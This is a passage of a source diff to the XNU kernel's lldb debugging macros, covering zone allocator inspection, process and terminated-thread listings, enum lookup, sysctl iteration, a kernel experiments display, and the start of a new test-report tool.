zone on noblock allocation + R - will be refilled when below low water mark S - currently trying to allocate more backing memory from kernel_memory_allocate with VM priv W - another thread is waiting for more memory - E - Per-cpu caching is enabled for this zone - L - zone is being monitored by zleaks - G - currently running GC - I - zone was destroyed and is no longer valid + X - expandable + Z - elements are zeroed on free """ global kern marks = [ ["collectable", "C"], - ["destructible", "D"], + ["z_destructible", "D"], ["expandable", "X"], - ["noencrypt", "$"], + ["z_noencrypt", "$"], ["exhaustible", "H"], - ["allows_foreign", "F"], - ["prio_refill_count", "R"], + ["z_allows_foreign", "F"], + ["z_elems_rsv", "R"], ["no_callout", "O"], ["zleak_on", "L"], - ["expanding_no_vm_priv", "A"], - ["expanding_vm_priv", "S"], - ["waiting", "W"], - ["cpu_cache_enabled", "E"], + ["z_expander", "A"], + ["z_expander_vm_priv", "S"], + ["z_replenish_wait", "W"], + ["z_pcpu_cache", "E"], ["gzalloc_exempt", "M"], ["alignment_required", "N"], - ["va_sequester", "!"] + ["z_va_sequester", "!"], + ["z_free_zeroes", "Z"] ] + stats = { - "cur_size": 0, "used_size": 0, "free_size": 0, + "cur_size": 0, "used_size": 0, "cached_size": 0, "free_size": 0, "cur_pages": 0, "free_pages": 0, "seq_pages": 0 } @@ -694,7 +776,7 @@ def Zprint(cmd_args=None, cmd_options={}, O=None): if zval.z_self: print GetZoneSummary(zval, marks, stats) - format_string = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[free_size]:11,d} ' + format_string = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[cached_size]:11,d} {stats[free_size]:11,d} ' format_string += ' ' format_string += '{stats[cur_pages]:6,d} {stats[free_pages]:6,d}{VT.EndBold} ' format_string += '(sequester: {VT.Bold}{stats[seq_pages]:,d}{VT.EndBold})' @@ -721,61 +803,7 @@ def TestZprint(kernel_target, config, lldb_obj, isConnected ): # EndMacro: zprint - -# Macro: showzfreelist - -def ShowZfreeListHeader(zone): - """ Helper routine to print a header for zone freelist. - (Since the freelist does not have a custom type, this is not defined as a Type Summary). - params: - zone:zone_t - Zone object to print header info - returns: - None - """ - - scaled_factor = (unsigned(kern.globals.zp_factor) + - (unsigned(zone.z_elem_size) >> unsigned(kern.globals.zp_scale))) - - out_str = "" - out_str += "{0: <9s} {1: <12s} {2: <18s} {3: <18s} {4: <6s}\n".format('ELEM_SIZE', 'COUNT', 'NCOOKIE', 'PCOOKIE', 'FACTOR') - out_str += "{0: <9d} {1: <12d} 0x{2:0>16x} 0x{3:0>16x} {4: <2d}/{5: <2d}\n\n".format( - zone.z_elem_size, zone.countavail - zone.countfree, kern.globals.zp_nopoison_cookie, kern.globals.zp_poisoned_cookie, zone.zp_count, scaled_factor) - out_str += "{0: <7s} {1: <18s} {2: <18s} {3: <18s} {4: <18s} {5: <18s} {6: <14s}\n".format( - 'NUM', 'ELEM', 'NEXT', 'BACKUP', '^ NCOOKIE', '^ PCOOKIE', 'POISON (PREV)') - print out_str - -def ShowZfreeListChain(zone, zfirst, zlimit): - """ Helper routine to print a zone free list chain - params: - zone: zone_t - Zone object - zfirst: void * - A pointer to the first element of the free list chain - zlimit: int - Limit for the number of elements to be printed by showzfreelist - returns: - None - """ - current = Cast(zfirst, 'void *') - while ShowZfreeList.elts_found < zlimit: - ShowZfreeList.elts_found += 1 - znext = dereference(Cast(current, 'vm_offset_t *')) - znext = (unsigned(znext) ^ unsigned(kern.globals.zp_nopoison_cookie)) - znext = kern.GetValueFromAddress(znext, 'vm_offset_t *') - backup_ptr = kern.GetValueFromAddress((unsigned(Cast(current, 'vm_offset_t')) + unsigned(zone.z_elem_size) - sizeof('vm_offset_t')), 'vm_offset_t *') - backup_val = dereference(backup_ptr) - n_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_nopoison_cookie)) - p_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_poisoned_cookie)) - poison_str = '' - if p_unobfuscated == unsigned(znext): - poison_str = "P ({0: 16x} 0x{2:0>16x} 0x{3:0>16x} 0x{4:0>16x} 0x{5:0>16x} {6: <14s}\n".format( - ShowZfreeList.elts_found, unsigned(current), unsigned(znext), - unsigned(backup_val), n_unobfuscated, p_unobfuscated, poison_str) - if unsigned(znext) == 0: - break - current = Cast(znext, 'void *') +# Macro: showzchunks def ZoneIteratePageQueue(page): while page.packed_address: @@ -783,42 +811,108 @@ def ZoneIteratePageQueue(page): yield meta page = meta.meta.zm_page_next -@static_var('elts_found',0) -@static_var('last_poisoned',0) -@lldb_command('showzfreelist') -def ShowZfreeList(cmd_args=None): - """ Walk the freelist for a zone, printing out the primary and backup next pointers, the poisoning cookies, and the poisoning status of each element. - Usage: showzfreelist [iterations] +@header("{: <20s} {: <20s} {: <20s} {: <25s} {: <10s} {: <8s} {: <4s} {: >9s}".format( + "Zone", "Metadata", "Page", "Bitmap", "Kind", "Queue", "Pgs", "Allocs")) +def GetZoneChunk(meta, queue, O=None): + format_string = "{meta.zone: <#20x} " + format_string += "{meta.meta_addr: <#20x} {meta.page_addr: <#20x} " + format_string += "{bitmap: <#18x} @{bitmap_size:<5d} " + format_string += "{kind:<10s} {queue:<8s} {pgs:<1d}/{chunk:<1d} " + format_string += "{alloc_count: >4d}/{avail_count: >4d}" + + pgs = int(meta.zone.z_chunk_pages) + chunk = pgs + if meta.meta.zm_chunk_len >= 0xe: + kind = "secondary" + pgs -= int(meta.meta.zm_page_index) + else: + kind = "primary" + + alloc_count=meta.getAllocCount() + avail_count=meta.getAllocAvail() + free_count=meta.getFreeCountSlow() + + if alloc_count + free_count != avail_count: + format_string += " {VT.Red}bitmap mismatch{VT.Default}" + + return O.format(format_string, meta=meta, + alloc_count=alloc_count, + avail_count=avail_count, + bitmap=meta.getBitmap(), + bitmap_size=meta.getBitmapSize(), + queue=queue, kind=kind, pgs=pgs, chunk=chunk) + +def ShowZChunksImpl(zone, extra_addr=None, cmd_options={}, O=None): + verbose = '-V' in cmd_options + + def do_content(meta, O, indent=False): + with O.table("{:>5s} {:<20s} {:<10s}".format("#", "Element", "State"), indent=indent): + i = 0 + for e in meta.iterateElements(): + status = "Allocated" + if meta.isElementFree(e): + status = "Free" + print O.format("{:5d} {:<#20x} {:10s}", i, e, status) + i += 1 + + if extra_addr is None: + with O.table(GetZoneChunk.header): + for meta in ZoneIteratePageQueue(zone.z_pageq_full): + print GetZoneChunk(meta, "full", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_partial): + print GetZoneChunk(meta, "partial", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_empty): + print GetZoneChunk(meta, "empty", O) + if verbose: do_content(meta, O, indent=True); + + for meta in ZoneIteratePageQueue(zone.z_pageq_va): + print GetZoneChunk(meta, "va", O) + else: + meta = ZoneMeta(extra_addr, isPageIndex="-I" in cmd_options).getReal() + with O.table(GetZoneChunk.header): + print GetZoneChunk(meta, "N/A", O) + do_content(meta, O) + +@lldb_command('showzchunks', "IV", fancy=True) +def ShowZChunks(cmd_args=None, cmd_options={}, O=None): + """ + prints the list of zone chunks, or the content of a given chunk + + Usage: showzchunks [-I] [-V] [address] + + Use -I to interpret [address] as a page index + Use -V to show the contents of all the chunks - Will walk up to 50 elements by default, pass a limit in 'iterations' to override. + [address] can by any address belonging to the zone, or metadata """ + if not cmd_args: - print ShowZfreeList.__doc__ - return - ShowZfreeList.elts_found = 0 - ShowZfreeList.last_poisoned = 0 + return O.error('missing zone argument') zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *') - zlimit = 50 - if len(cmd_args) >= 2: - zlimit = ArgumentStringToInt(cmd_args[1]) - ShowZfreeListHeader(zone) - for head in [zone.pages_any_free_foreign, zone.pages_intermediate, zone.pages_all_free]: - for free_page_meta in ZoneIteratePageQueue(head): - if ShowZfreeList.elts_found == zlimit: - break - zfirst = free_page_meta.getFreeList() - if zfirst != 0: - ShowZfreeListChain(zone, zfirst, zlimit) - - if ShowZfreeList.elts_found == zlimit: - print "Stopped at {0: 7s} {:>7s} {:>7s} {:<50s}".format("tag.kmod", "peak", "size", "mapped", "name") + print " {:<7s} {:>7s} {:>7s} {:<50s}".format("tag.kmod", "size", "mapped", "name") for tag in tags: if not tagstr: tagstr = "" - print " {:>3d}{:<4s} {:>7d}K {:>7d}K {:>7d}K {:<50s}".format(tag["tag"], tag["tagstr"], tag["peak"] / 1024, tag["size"] / 1024, tag["mapped"] / 1024, tag["name"]) + print " {:>3d}{:<4s} {:>7d}K {:>7d}K {:<50s}".format(tag["tag"], tag["tagstr"], tag["size"] / 1024, tag["mapped"] / 1024, tag["name"]) for sub in tag["subtotals"]: if ((sub["flags"] & 0x007f) == 0): kind_str = "named" else: kind_str = "from" - print " {:>7s} {:>7s} {:>7s} {:>7d}K {:s} {:>3d}{:<4s} {:<50s}".format(" ", " ", " ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"]) + print " {:>7s} {:>7d}K {:s} {:>3d}{:<4s} {:<50s}".format(" ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"]) - print "Total: {:>7d}K {:>7d}K".format(total / 1024, totalmapped / 1024) + print "Total: {:>7d}K {:>7d}K".format(total / 1024, totalmapped / 1024) return None @@ -3759,22 +3856,14 @@ def ShowAllocatedElementsInZone(cmd_args=None, cmd_options={}): def FindAllocatedElementsInZone(zone): elements = [] - if not zone.z_self or zone.permanent: + if not zone.z_self or zone.z_permanent: return elements - for head in [zone.pages_any_free_foreign, zone.pages_all_used_foreign, - zone.pages_intermediate, zone.pages_all_used]: - + for head in [zone.z_pageq_partial, zone.z_pageq_full]: for meta in ZoneIteratePageQueue(head): - free_elements = set(meta.iterateFreeList()) - for elem in meta.iterateElements(): - if elem in free_elements: - continue - - if elem not in free_elements: + if not meta.isElementFree(elem): elements.append(elem) - elem += zone.z_elem_size return elements @@ -4145,7 +4234,7 @@ def ShowAllAppleProtectPagers(cmd_args=None): """Routine to print all apple_protect pagers usage: show_all_apple_protect_pagers """ - print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "mo_control", "object", "offset", "crypto_offset", "crypto_start", "crypto_end") + print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "cached", "object", "offset", "crypto_offset", "crypto_start", "crypto_end") qhead = kern.globals.apple_protect_pager_queue qtype = GetType('apple_protect_pager *') qcnt = kern.globals.apple_protect_pager_count @@ -4173,7 +4262,56 @@ def show_apple_protect_pager(pager, qcnt, idx): shadow = object.shadow vnode_pager = Cast(object.pager,'vnode_pager *') filename = GetVnodePath(vnode_pager.vnode_handle) - print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} \n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, pager.ref_count, pager.is_ready, pager.is_mapped, pager.pager_control, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename) + if hasattr(pager, "ap_pgr_hdr_ref"): + refcnt = pager.ap_pgr_hdr_ref + else: + refcnt = pager.ap_pgr_hdr.mo_ref + print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} \n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, refcnt, pager.is_ready, pager.is_mapped, pager.is_cached, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename) + showvmobject(pager.backing_object, pager.backing_offset, pager.crypto_end - pager.crypto_start, 1, 1) + +@lldb_command("show_all_shared_region_pagers") +def ShowAllSharedRegionPagers(cmd_args=None): + """Routine to print all shared_region pagers + usage: show_all_shared_region_pagers + """ + print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "object", "offset", "jop_key", "slide", "slide_info") + qhead = kern.globals.shared_region_pager_queue + qtype = GetType('shared_region_pager *') + qcnt = kern.globals.shared_region_pager_count + idx = 0 + for pager in IterateQueue(qhead, qtype, "srp_queue"): + idx = idx + 1 + show_shared_region_pager(pager, qcnt, idx) + +@lldb_command("show_shared_region_pager") +def ShowSharedRegionPager(cmd_args=None): + """Routine to print out info about a shared_region pager + usage: show_shared_region_pager + """ + if cmd_args == None or len(cmd_args) < 1: + print "Invalid argument.", ShowSharedRegionPager.__doc__ + return + pager = kern.GetValueFromAddress(cmd_args[0], 'shared_region_pager_t') + show_shared_region_pager(pager, 1, 1) + +def show_shared_region_pager(pager, qcnt, idx): + object = pager.srp_backing_object + shadow = object.shadow + while shadow != 0: + object = shadow + shadow = object.shadow + vnode_pager = Cast(object.pager,'vnode_pager *') + filename = GetVnodePath(vnode_pager.vnode_handle) + if hasattr(pager, 'srp_ref_count'): + ref_count = pager.srp_ref_count + else: + ref_count = pager.srp_header.mo_ref + if hasattr(pager, 'srp_jop_key'): + jop_key = pager.srp_jop_key + else: + jop_key = -1 + print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x}\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, ref_count, pager.srp_is_ready, pager.srp_is_mapped, pager.srp_backing_object, pager.srp_backing_offset, jop_key, pager.srp_slide_info.si_slide, pager.srp_slide_info, vnode_pager.vnode_handle, filename) + showvmobject(pager.srp_backing_object, pager.srp_backing_offset, pager.srp_slide_info.si_end - pager.srp_slide_info.si_start, 1, 1) @lldb_command("show_console_ring") def ShowConsoleRingData(cmd_args=None): @@ -4545,36 +4683,6 @@ def vm_page_lookup_in_compressor(slot_ptr): else: print "" -def print_hex_data(data, begin_offset=0, desc=""): - """ print on stdout "hexdump -C < data" like output - params: - data - bytearray or array of int where each int < 255 - begin_offset - int offset that should be printed in left column - desc - str optional description to print on the first line to describe data - """ - if desc: - print "{}:".format(desc) - index = 0 - total_len = len(data) - hex_buf = "" - char_buf = "" - while index < total_len: - hex_buf += " {:02x}".format(data[index]) - if data[index] < 0x20 or data[index] > 0x7e: - char_buf += "." - else: - char_buf += "{:c}".format(data[index]) - index += 1 - if index and index % 8 == 0: - hex_buf += " " - if index > 1 and (index % 16) == 0: - print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf) - hex_buf = "" - char_buf = "" - if index % 16 != 0: - print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf) - return - @lldb_command('vm_scan_all_pages') def VMScanAllPages(cmd_args=None): """Scans the vm_pages[] array diff --git a/tools/lldbmacros/process.py b/tools/lldbmacros/process.py index c7d5f493c..6bab4e27c 100755 --- a/tools/lldbmacros/process.py +++ b/tools/lldbmacros/process.py @@ -11,6 +11,7 @@ import time import xnudefines import memory import json +from collections import defaultdict def GetProcName(proc): """ returns a string name of the process. Longer variant is preffered if provided. @@ -26,17 +27,25 @@ def GetProcName(proc): return str(proc.p_comm) def GetProcNameForTask(task): - """ returns a string name of the process. if proc is not valid "unknown" is returned + """ returns a string name of the process. If proc is not valid the proc + name is looked up in the associated importance structure (if + available). If no name can be found, "unknown" is returned. params: task: value object represeting a task in the kernel. returns: str : A string name of the process linked to the task """ - if not task or not unsigned(task.bsd_info): - return "unknown" - p = Cast(task.bsd_info, 'proc *') + if task: + if unsigned(task.bsd_info): + p = Cast(task.bsd_info, 'proc *') + return GetProcName(p) + + if (hasattr(task, 'task_imp_base') and + hasattr(task.task_imp_base, 'iit_procname') and + unsigned(task.task_imp_base) != 0): + return str(task.task_imp_base.iit_procname) - return GetProcName(p) + return "unknown" def GetProcPIDForTask(task): """ returns a int pid of the process. if the proc is not valid, val[5] from audit_token is returned. @@ -187,6 +196,7 @@ def GetASTSummary(ast): K - AST_KPERF M - AST_MACF r - AST_RESET_PCS + a - AST_ARCADE G - AST_GUARD T - AST_TELEMETRY_USER T - AST_TELEMETRY_KERNEL @@ -201,12 +211,12 @@ def GetASTSummary(ast): out_string = "" state = int(ast) thread_state_chars = {0x0:'', 0x1:'P', 0x2:'Q', 0x4:'U', 0x8:'H', 0x10:'Y', 0x20:'A', - 0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', + 0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', 0x800: 'a', 0x1000:'G', 0x2000:'T', 0x4000:'T', 0x8000:'T', 0x10000:'S', 0x20000: 'D', 0x40000: 'I', 0x80000: 'E', 0x100000: 'R', 0x200000: 'N'} state_str = '' mask = 0x1 - while mask <= 0x80000: + while mask <= 0x200000: state_str += thread_state_chars[int(state & mask)] mask = mask << 1 @@ -583,7 +593,7 @@ def GetThreadGroupSummary(tg): tg_flags += 'E' if (tg.tg_flags & 0x2): tg_flags += 'U' - out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount, tg_flags, tg.tg_recommendation) + out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount.ref_count, tg_flags, tg.tg_recommendation) return out_string @lldb_command('showallthreadgroups') @@ -1052,8 +1062,20 @@ def ShowTerminatedTasks(cmd_args=None): global kern print GetTaskSummary.header + " " + GetProcSummary.header for t in kern.terminated_tasks: + + # If the task has been terminated it's likely that the process is + # gone too. If there is no proc it may still be possible to find + # the original proc name. pval = Cast(t.bsd_info, 'proc *') - print GetTaskSummary(t) +" "+ GetProcSummary(pval) + if pval: + psummary = GetProcSummary(pval) + else: + name = GetProcNameForTask(t); + pslen = GetProcSummary.header.find("command"); + psummary = "{0: <{indent}} {1: [thread, ..] map of terminated threads + tmap = defaultdict(list) + for thr in kern.terminated_threads: + tmap[unsigned(thr.task)].append(thr) + for t in kern.tasks: ShowTaskThreads([str(int(t))]) + ShowTaskTerminatedThreads(t) print " \n" - + for t in kern.terminated_tasks: print "Terminated: \n" ShowTaskThreads([str(int(t))]) + ShowTaskTerminatedThreads(t) print " \n" - + + return + +@lldb_command('showterminatedthreads') +def ShowTerminatedThreads(cmd_args=None): + """ Display info about all terminated threads in the system + """ + + global kern + print GetThreadSummary.header + for t in kern.terminated_threads: + print GetThreadSummary(t) + return @lldb_command('showtaskthreads', "F:") @@ -1346,7 +1394,7 @@ def GetFullBackTrace(frame_addr, verbosity = vHUMAN, prefix = ""): if (not kern.arch.startswith('arm') and frame_ptr < mh_execute_addr) or (kern.arch.startswith('arm') and frame_ptr > mh_execute_addr): break pc_val = kern.GetValueFromAddress(frame_ptr + kern.ptrsize,'uintptr_t *') - pc_val = unsigned(dereference(pc_val)) + pc_val = kern.StripKernelPAC(unsigned(dereference(pc_val))) out_string += prefix + GetSourceInformationForAddress(pc_val) + "\n" bt_count +=1 previous_frame_ptr = frame_ptr diff --git a/tools/lldbmacros/utils.py b/tools/lldbmacros/utils.py index 6039f2048..b726867d5 100755 --- a/tools/lldbmacros/utils.py +++ b/tools/lldbmacros/utils.py @@ -305,25 +305,38 @@ def WriteInt8ToMemoryAddress(intval, addr): return False _enum_cache = {} -def GetEnumValue(name): +def GetEnumValue(enum_name_or_combined, member_name = None): """ Finds the value of a particular enum define. Ex kdp_req_t::KDP_VERSION => 0x3 params: - name : str - name of enum in the format type::name + enum_name_or_combined: str + name of an enum of the format type::name (legacy) + name of an enum type + member_name: None, or the name of an enum member + (then enum_name_or_combined is a type name). returns: int - value of the particular enum. raises: TypeError - if the enum is not found """ - name = name.strip() global _enum_cache - if name not in _enum_cache: - res = lldb.SBCommandReturnObject() - lldb.debugger.GetCommandInterpreter().HandleCommand("p/x (`%s`)" % name, res) - if not res.Succeeded(): - raise TypeError("Enum not found with name: " + name) - # the result is of format '(int) $481 = 0x00000003\n' - _enum_cache[name] = int( res.GetOutput().split('=')[-1].strip(), 16) - return _enum_cache[name] + if member_name is None: + enum_name, member_name = enum_name_or_combined.strip().split("::") + else: + enum_name = enum_name_or_combined + + if enum_name not in _enum_cache: + ty = GetType(enum_name) + d = {} + + for e in ty.get_enum_members_array(): + if ty.GetTypeFlags() & lldb.eTypeIsSigned: + d[e.GetName()] = e.GetValueAsSigned() + else: + d[e.GetName()] = e.GetValueAsUnsigned() + + _enum_cache[enum_name] = d + + return _enum_cache[enum_name][member_name] def ResolveFSPath(path): """ expand ~user directories and return absolute path. @@ -442,12 +455,13 @@ def IsAppleInternal(): retval = False return retval -def print_hex_data(data, begin_offset=0, desc=""): +def print_hex_data(data, begin_offset=0, desc="", marks={}): """ print on stdout "hexdump -C < data" like output params: data - bytearray or array of int where each int < 255 begin_offset - int offset that should be printed in left column desc - str optional description to print on the first line to describe data + mark - dictionary of markers """ if desc: print "{}:".format(desc) @@ -456,7 +470,11 @@ def print_hex_data(data, begin_offset=0, desc=""): hex_buf = "" char_buf = "" while index < total_len: - hex_buf += " {:02x}".format(data[index]) + if marks.has_key(begin_offset + index): + hex_buf += marks[begin_offset + index] + hex_buf += "{:02x}".format(data[index]) + else: + hex_buf += " {:02x}".format(data[index]) if data[index] < 0x20 or data[index] > 0x7e: char_buf += "." else: diff --git a/tools/lldbmacros/xnu.py b/tools/lldbmacros/xnu.py index d935362ab..ce5997b5e 100755 --- a/tools/lldbmacros/xnu.py +++ b/tools/lldbmacros/xnu.py @@ -284,7 +284,7 @@ def GetObjectAtIndexFromArray(array_base, index): base_address = array_base_val.GetValueAsUnsigned() size = array_base_val.GetType().GetPointeeType().GetByteSize() obj_address = base_address + (index * size) - obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType().GetName()) + obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType()) return Cast(obj, array_base_val.GetType()) @@ -1169,7 +1169,35 @@ def TrapTrace_cmd(cmd_args=[], cmd_options={}): Trace_cmd(cmd_args, cmd_options, hdrString, entryString, kern.globals.traptrace_ring, kern.globals.traptrace_entries_per_cpu, MAX_TRAPTRACE_BACKTRACES) - + +# Yields an iterator over all the sysctls from the provided root. +# Can optionally filter by the given prefix +def IterateSysctls(root_oid=kern.globals.sysctl__children, prefix="", depth = 0, parent = ""): + headp = root_oid + for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'): + node_str = "" + if prefix != "": + node_str = str(pp.oid_name) + if parent != "": + node_str = parent + "." + node_str + if node_str.startswith(prefix): + yield pp, depth, parent + else: + yield pp, depth, parent + type = pp.oid_kind & 0xf + if type == 1 and pp.oid_arg1 != 0: + if node_str == "": + next_parent = str(pp.oid_name) + if parent != "": + next_parent = parent + "." + next_parent + else: + next_parent = node_str + # Only recurse if the next parent starts with our allowed prefix. + # Note that it's OK if the parent string is too short (because the prefix might be for a deeper node). + prefix_len = min(len(prefix), len(next_parent)) + if next_parent[:prefix_len] == prefix[:prefix_len]: + for x in IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), prefix, depth + 1, next_parent): + yield x @lldb_command('showsysctls', 'P:') def ShowSysctls(cmd_args=[], cmd_options={}): @@ -1186,28 +1214,63 @@ def ShowSysctls(cmd_args=[], cmd_options={}): else: _ShowSysctl_prefix = '' allowed_prefixes = [] - def IterateSysctls(oid, parent_str, i): - headp = oid - parentstr = "" if parent_str is None else parent_str - for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'): - type = pp.oid_kind & 0xf - next_parent = str(pp.oid_name) - if parent_str is not None: - next_parent = parent_str + "." + next_parent - st = (" " * i) + str(pp.GetSBValue().Dereference()).replace("\n", "\n" + (" " * i)) - if type == 1 and pp.oid_arg1 != 0: - # Check allowed_prefixes to see if we can recurse from root to the allowed prefix. - # To recurse further, we need to check only the the next parent starts with the user-specified - # prefix - if next_parent not in allowed_prefixes and next_parent.startswith(_ShowSysctl_prefix) is False: - continue - print 'parent = "%s"' % parentstr, st[st.find("{"):] - IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), next_parent, i + 2) - elif _ShowSysctl_prefix == '' or next_parent.startswith(_ShowSysctl_prefix): - print ('parent = "%s"' % parentstr), st[st.find("{"):] - IterateSysctls(kern.globals.sysctl__children, None, 0) + for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children, _ShowSysctl_prefix): + if parentstr == "": + parentstr = "" + headp = sysctl + st = (" " * depth * 2) + str(sysctl.GetSBValue().Dereference()).replace("\n", "\n" + (" " * depth * 2)) + print 'parent = "%s"' % parentstr, st[st.find("{"):] + +@lldb_command('showexperiments', 'F') +def ShowExperiments(cmd_args=[], cmd_options={}): + """ Shows any active kernel experiments being run on the device via trial. + Arguments: + -F: Scan for changed experiment values even if no trial identifiers have been set. + """ + + treatment_id = str(kern.globals.trial_treatment_id) + experiment_id = str(kern.globals.trial_experiment_id) + deployment_id = kern.globals.trial_deployment_id._GetValueAsSigned() + if treatment_id == "" and experiment_id == "" and deployment_id == -1: + print("Device is not enrolled in any kernel experiments.") + if not '-F' in cmd_options: + return + else: + print("""Device is enrolled in a kernel experiment: + treatment_id: %s + experiment_id: %s + deployment_id: %d""" % (treatment_id, experiment_id, deployment_id)) + + print("Scanning sysctl tree for modified factors...") + + kExperimentFactorFlag = 0x00100000 + + formats = { + "IU": gettype("unsigned int *"), + "I": gettype("int *"), + "LU": gettype("unsigned long *"), + "L": gettype("long *"), + "QU": gettype("uint64_t *"), + "Q": gettype("int64_t *") + } + for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children): + if sysctl.oid_kind & kExperimentFactorFlag: + spec = cast(sysctl.oid_arg1, "struct experiment_spec *") + # Skip if arg2 isn't set to 1 (indicates an experiment factor created without an experiment_spec). + if sysctl.oid_arg2 == 1: + if spec.modified == 1: + fmt = str(sysctl.oid_fmt) + ptr = spec.ptr + t = formats.get(fmt, None) + if t: + value = cast(ptr, t) + else: + # Unknown type + continue + name = str(parentstr) + "." + str(sysctl.oid_name) + print("%s = %d (Default value is %d)" % (name, dereference(value), spec.original_value)) from memory import * from process import * @@ -1240,3 +1303,4 @@ from ulock import * from ntstat import * from zonetriage import * from sysreg import * +from counter import * diff --git a/tools/tests/Makefile b/tools/tests/Makefile index 2c929f93f..a385e3dbb 100644 --- a/tools/tests/Makefile +++ b/tools/tests/Makefile @@ -33,6 +33,7 @@ COMMON_TARGETS = unit_tests \ perf_index \ personas \ unixconf \ + kernpost_test_report \ KEXT_TARGETS = pgokext.kext diff --git a/tools/tests/kernpost_test_report/Makefile b/tools/tests/kernpost_test_report/Makefile new file mode 100644 index 000000000..0181a8747 --- /dev/null +++ b/tools/tests/kernpost_test_report/Makefile @@ -0,0 +1,18 @@ +include ../Makefile.common + +DSTROOT?=$(shell /bin/pwd) +SYMROOT?=$(shell /bin/pwd) +OBJROOT?=$(shell /bin/pwd) + +CC:=$(shell xcrun -sdk "$(SDKROOT)" -find cc) + +CFLAGS:=$(ARCH_FLAGS) -g -Wall -Os -isysroot $(SDKROOT) -I$(SDKROOT)/System/Library/Frameworks/System.framework/PrivateHeaders -lkdd -framework Foundation + +all: $(DSTROOT)/kernpost_test_report + +$(DSTROOT)/kernpost_test_report: kernpost_test_report.m + $(CC) -o $@ $^ $(subst -arch i386,,$(CFLAGS)) + +clean: + rm -f $(DSTROOT)/kernpost_test_report $(OBJROOT)/*.o + rm -rf $(SYMROOT)/*.dSYM diff --git a/tools/tests/kernpost_test_report/kernpost_test_report.m b/tools/tests/kernpost_test_report/kernpost_test_report.m new file mode 100644 index 000000000..76d81a0ba --- /dev/null +++ b/tools/tests/kernpost_test_report/kernpost_test_report.m @@ -0,0 +1,379 @@ +#import +#include +#import +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define FREE_BUF(_buf) \ + do { \ + if (_buf) { \ + free(_buf); \ + _buf = NULL; \ + } \ + } while (0); + +#define ERR(_msg_format, ...) fprintf(stderr, "error: " _msg_format "\n", ##__VA_ARGS__) + +#define PERR(_msg) perror("error: " _msg) + +/* XNUPost KCData constants */ +NSString * const kXNUPostKCDataKeyTestConfig = @"xnupost_testconfig"; +NSString * const kXNUPostKCDataKeyOSVersion = @"osversion"; +NSString * const kXNUPostKCDataKeyBootargs = @"boot_args"; +NSString * const kXNUPostKCDataKeyMachTBInfo = @"mach_timebase_info"; +NSString * const kXNUPostKCDataKeyMachTBInfoDenom = @"denom"; +NSString * const kXNUPostKCDataKeyMachTBInfoNumer = @"numer"; +NSString * const kXNUPostKCDataKeySubTestConfig = @"xnupost_test_config"; +NSString * const kXNUPostKCDataKeyTestName = @"test_name"; +NSString * const kXNUPostKCDataKeyBeginTime = @"begin_time"; +NSString * const kXNUPostKCDataKeyEndTime = @"end_time"; +NSString * const kXNUPostKCDataKeyRetval = @"retval"; +NSString * const kXNUPostKCDataKeyExpectedRetval = @"expected_retval"; + +/* Resultbundle info constants */ +NSString * const kRBInfoKeyVersion = @"version"; +NSString * const kRBInfoKeyCategory = @"test_category"; +NSString * const kRBInfoKeyTestID = @"test_id"; +NSString * const kRBInfoKeyProject = @"Project"; +NSString * const 